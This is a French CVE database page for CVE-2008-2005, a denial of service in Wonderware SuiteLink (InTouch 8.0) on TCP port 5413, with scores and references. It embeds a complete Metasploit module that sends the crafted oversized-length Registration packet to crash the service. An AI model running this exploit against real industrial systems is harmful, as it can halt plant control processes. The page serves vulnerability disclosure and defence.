CVE-2008-2005 : Détail

CVE-2008-2005

33.19%V4
Network
2008-05-06
13h00 +00:00
2018-10-11
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The SuiteLink Service (aka slssvc.exe) in WonderWare SuiteLink before 2.0 Patch 01, as used in WonderWare InTouch 8.0, allows remote attackers to cause a denial of service (NULL pointer dereference and service shutdown) and possibly execute arbitrary code via a large length value in a Registration packet to TCP port 5413, which causes a memory allocation failure.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6474

Date de publication : 2008-09-16 22h00 +00:00
Auteur : belay tows
EDB Vérifié : Yes

## # $Id: suitlink.rb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Wonderware SuitLink Denial of Service', 'Description' => %q{ This module exploits a denial of service vulnerability within the SuitLink service in Wonderware products. }, 'Author' => [ 'belay tows' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'References' => [ [ 'BID', '28974' ], [ 'CVE', '2008-2005' ], ], 'DisclosureDate' => 'May 05 2008')) register_options([Opt::RPORT(5413),], self.class) end def run connect print_status("Sending DoS packet...") dos_length = 0xBAADF00D pkt = "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F" pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00" pkt << [dos_length].pack("V") len = [pkt.length].pack("C") sock.put(len) sock.put(pkt) sleep 15 # wait to avoid thread shutdown event disconnect end end end # milw0rm.com [2008-09-17]

Products Mentioned

Configuraton 0

Wonderware>>Intouch >> Version 8.0

Wonderware>>Suitelink >> Version 2.0

    Références

    http://www.kb.cert.org/vuls/id/596268
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.securityfocus.com/bid/28974
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/6474
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securitytracker.com/id?1019966
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/30063
    Tags : third-party-advisory, x_refsource_SECUNIA